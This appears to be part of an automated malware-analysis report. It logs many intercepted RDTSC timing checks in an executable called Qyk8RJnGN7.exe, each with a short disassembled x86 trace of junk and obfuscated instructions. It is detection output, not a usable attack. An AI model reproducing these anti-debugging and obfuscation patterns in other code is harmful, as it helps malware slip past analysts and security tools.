    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ABD9 second address: E9ABEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0BACBDA196h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9AED0 second address: E9AED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B483 second address: E9B492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B492 second address: E9B496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B496 second address: E9B4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B4A4 second address: E9B4AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9CD7D second address: E9CD8B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9CD8B second address: E9CD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9CD8F second address: E9CD9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9D7DE second address: E9D87F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F0BACBDA3D8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+1245715Dh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F0BACBDA3D8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D1E4Fh] 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007F0BACBDA3D8h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a xchg eax, ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e jmp 00007F0BACBDA3DDh 0x00000073 jnl 00007F0BACBDA3D6h 0x00000079 popad 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9E2C4 second address: E9E2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0BACBDA1A6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ED99 second address: E9ED9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ED9D second address: E9EDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDA7 second address: E9EDEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D304Ch] 0x00000013 push 00000000h 0x00000015 mov esi, 0EF31CCDh 0x0000001a push 00000000h 0x0000001c mov esi, 09E79500h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0BACBDA3E1h 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDEC second address: E9EDF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDF2 second address: E9EDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDF8 second address: E9EDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDFC second address: E9EE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EE00 second address: E9EE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0BACBDA1A1h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EE1C second address: E9EE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9F8F2 second address: E9F8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00DB second address: EA00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA0A93 second address: EA0AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00E1 second address: EA00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA0AA7 second address: EA0AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00E5 second address: EA00E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA2B5F second address: EA2B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00E9 second address: EA00FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F0BACBDA3D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA4A5A second address: EA4A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1EA2h], edx 0x00000010 push 00000000h 0x00000012 jmp 00007F0BACBDA1A3h 0x00000017 mov ebx, 187E1928h 0x0000001c push 00000000h 0x0000001e adc ebx, 27F3A54Ah 0x00000024 mov ebx, dword ptr [ebp+122D2BEFh] 0x0000002a push eax 0x0000002b pushad 0x0000002c push edi 0x0000002d jne 00007F0BACBDA196h 0x00000033 pop edi 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6956 second address: EA696C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F0BACBDA3D6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA2E0F second address: EA2E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6B3C second address: EA6B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F0BACBDA3E0h 0x0000000b nop 0x0000000c add bx, DC6Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, 6988E413h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 add dword ptr [ebp+124751C9h], edx 0x0000002a mov eax, dword ptr [ebp+122D0D01h] 0x00000030 sub bh, FFFFFF80h 0x00000033 clc 0x00000034 push FFFFFFFFh 0x00000036 mov bh, 04h 0x00000038 nop 0x00000039 push esi 0x0000003a jmp 00007F0BACBDA3DDh 0x0000003f pop esi 0x00000040 push eax 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6B95 second address: EA6B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6B99 second address: EA6B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA7C65 second address: EA7C6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA7C6A second address: EA7C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EADD96 second address: EADDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB0EDC second address: EB0EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A28 second address: EB8A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A2C second address: EB8A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A30 second address: EB8A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A3B second address: EB8A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DBh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EADF4D second address: EADF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA9C26 second address: EA9C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA9C2C second address: EA9C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8D8F second address: EB8D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B1C second address: EC1B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B20 second address: EC1B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B29 second address: EC1B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0BACBDA196h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F0BACBDA1A2h 0x00000013 jg 00007F0BACBDA19Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B44 second address: EC1B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push edi 0x00000009 jmp 00007F0BACBDA3E9h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jne 00007F0BACBDA3D8h 0x00000018 jmp 00007F0BACBDA3DFh 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B8B second address: EC1BA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA1A4h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1CE8 second address: EC1CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1CEC second address: EC1CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1DD1 second address: EC1DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA3E7h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1DF0 second address: EC1DF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1DF4 second address: EC1E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b js 00007F0BACBDA3DEh 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1E08 second address: EC1E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007F0BACBDA196h 0x00000011 popad 0x00000012 jo 00007F0BACBDA198h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1E2B second address: CF5EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F0BACBDA3D8h 0x0000000b popad 0x0000000c pop eax 0x0000000d cld 0x0000000e cld 0x0000000f push dword ptr [ebp+122D0579h] 0x00000015 pushad 0x00000016 movzx edi, cx 0x00000019 jmp 00007F0BACBDA3DDh 0x0000001e popad 0x0000001f call dword ptr [ebp+122D31A9h] 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D1E1Bh], ebx 0x0000002c or dword ptr [ebp+122D1E1Bh], ecx 0x00000032 xor eax, eax 0x00000034 jnl 00007F0BACBDA3E9h 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cld 0x0000003f mov dword ptr [ebp+122D2DEBh], eax 0x00000045 cld 0x00000046 mov esi, 0000003Ch 0x0000004b js 00007F0BACBDA3E6h 0x00000051 jmp 00007F0BACBDA3E0h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a sub dword ptr [ebp+122D1E1Bh], eax 0x00000060 lodsw 0x00000062 jmp 00007F0BACBDA3DCh 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D332Ch], edx 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 pushad 0x00000076 xor dx, FF16h 0x0000007b jnl 00007F0BACBDA3E8h 0x00000081 popad 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push esi 0x00000087 pop esi 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E57B39 second address: E57B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC5D0F second address: EC5D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA3E4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b jmp 00007F0BACBDA3E7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 jl 00007F0BACBDA3D6h 0x0000001a pop ecx 0x0000001b pushad 0x0000001c jmp 00007F0BACBDA3E2h 0x00000021 jmp 00007F0BACBDA3E4h 0x00000026 jno 00007F0BACBDA3D6h 0x0000002c popad 0x0000002d push edi 0x0000002e push esi 0x0000002f pop esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC5EC1 second address: EC5ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC5ECB second address: EC5EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jnp 00007F0BACBDA3D6h 0x00000014 pop ecx 0x00000015 jmp 00007F0BACBDA3E0h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC632E second address: EC6346 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0BACBDA196h 0x00000008 jg 00007F0BACBDA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F0BACBDA19Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC6346 second address: EC6374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007F0BACBDA3E2h 0x0000000c popad 0x0000000d ja 00007F0BACBDA3F0h 0x00000013 jo 00007F0BACBDA3DAh 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC6374 second address: EC637A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F4C second address: EC9F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F52 second address: EC9F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F56 second address: EC9F6A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jbe 00007F0BACBDA3D6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F6A second address: EC9F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F0BACBDA196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E95A0B second address: E95A11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E95A11 second address: E95A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007F0BACBDA1A9h 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E95B6D second address: E95B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9608D second address: E9612D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0BACBDA196h 0x0000000a popad 0x0000000b pop ecx 0x0000000c add dword ptr [esp], 464A77E7h 0x00000013 movzx edx, cx 0x00000016 call 00007F0BACBDA199h 0x0000001b push eax 0x0000001c pushad 0x0000001d jno 00007F0BACBDA196h 0x00000023 push edx 0x00000024 pop edx 0x00000025 popad 0x00000026 pop eax 0x00000027 push eax 0x00000028 jmp 00007F0BACBDA1A2h 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 pushad 0x00000032 jnp 00007F0BACBDA198h 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b jmp 00007F0BACBDA1A6h 0x00000040 jmp 00007F0BACBDA1A1h 0x00000045 popad 0x00000046 popad 0x00000047 mov eax, dword ptr [eax] 0x00000049 jl 00007F0BACBDA1A7h 0x0000004f jmp 00007F0BACBDA1A1h 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 pushad 0x00000059 pushad 0x0000005a jmp 00007F0BACBDA19Ah 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9612D second address: E9613A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0BACBDA3D6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E967CA second address: E967CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96B8A second address: E96B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
